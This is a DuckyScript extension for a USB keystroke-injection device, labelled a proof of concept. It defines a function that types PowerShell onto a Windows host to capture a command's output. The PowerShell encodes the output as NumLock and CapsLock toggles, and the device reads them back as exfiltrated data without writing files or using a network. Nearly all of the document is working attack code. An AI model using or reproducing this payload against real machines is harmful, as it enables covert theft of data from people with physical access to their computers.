45 lines
1.9 KiB
Plaintext
45 lines
1.9 KiB
Plaintext
EXTENSION WINDOWS_FILELESS_HID_EXFIL
|
|
REM VERSION 1.0
|
|
REM AUTHOR: 0i41E
|
|
|
|
REM_BLOCK DOCUMENTATION
|
|
Extension for Keystroke Reflection data exfiltration without putting files on disk.
|
|
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
|
|
|
|
TARGET:
|
|
Windows Hosts that supports powershell and SendKeys
|
|
|
|
USAGE:
|
|
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
|
|
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
|
|
|
|
Example Usage:
|
|
GUI r
|
|
DELAY 500
|
|
STRINGLN powershell
|
|
DELAY 1000
|
|
STRING echo "This is my test"
|
|
Windows_Fileless_HID_Exfil()
|
|
END_REM
|
|
|
|
FUNCTION Windows_Fileless_HID_Exfil()
|
|
DELAY 250
|
|
REM Saving current Keyboard lock keys
|
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
|
$_EXFIL_MODE_ENABLED = TRUE
|
|
$_EXFIL_LEDS_ENABLED = TRUE
|
|
DELAY 500
|
|
REM Setting the output as variable
|
|
STRING |Out-String|Set-Variable -Name "DD";
|
|
REM Converting output into Lock Key values
|
|
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
|
|
REM Exfiltrating via Keystroke Reflection
|
|
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
|
|
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
|
|
WAIT_FOR_SCROLL_CHANGE
|
|
LED_G
|
|
$_EXFIL_MODE_ENABLED = FALSE
|
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
END_FUNCTION
|
|
END_EXTENSION
|